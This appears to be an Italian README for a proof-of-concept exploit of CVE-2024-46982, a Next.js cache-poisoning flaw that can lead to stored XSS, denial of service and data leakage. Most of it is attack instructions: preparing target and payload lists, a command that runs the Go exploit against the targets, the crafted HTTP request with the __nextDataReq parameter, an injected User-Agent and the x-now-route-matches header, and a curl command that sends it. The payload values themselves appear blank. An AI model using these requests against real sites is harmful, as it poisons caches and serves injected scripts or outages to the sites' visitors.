
POC CVE-2024-46982
Questo strumento automatizza il rilevamento e lo sfruttamento di CVE-2024-46982, una vulnerabilità di cache poisoning in Next.js, in cui le risposte del Server-Side Rendering (SSR) possono essere erroneamente memorizzate nella cache come Static Site Generation (SSG). Questa errata configurazione può portare a Stored XSS, DoS e perdita di dati, consentendo agli attaccanti di iniettare contenuti malevoli nelle risposte memorizzate nella cache.
Crea un file chiamato targets.txt contenente un URL target per riga:
https://vulnerable-site.com
https://another-target.com
Crea un file chiamato payloads.txt contenente i payload che verranno iniettati tramite l'header User-Agent:
Compila ed esegui l'exploit con:
go run exploit.go -f targets.txt -p payloads.txt -d 5
GET /poc?__nextDataReq=1 HTTP/1.1
Host: vulnerable-site.com
User-Agent: <PAYLOAD>
x-now-route-matches: 1
Invia una richiesta malevola usando curl:
curl -X GET "https://vulnerable-site.com/poc?__nextDataReq=1" \
-H "User-Agent: " \
-H "x-now-route-matches: 1"
Visita l'endpoint in un browser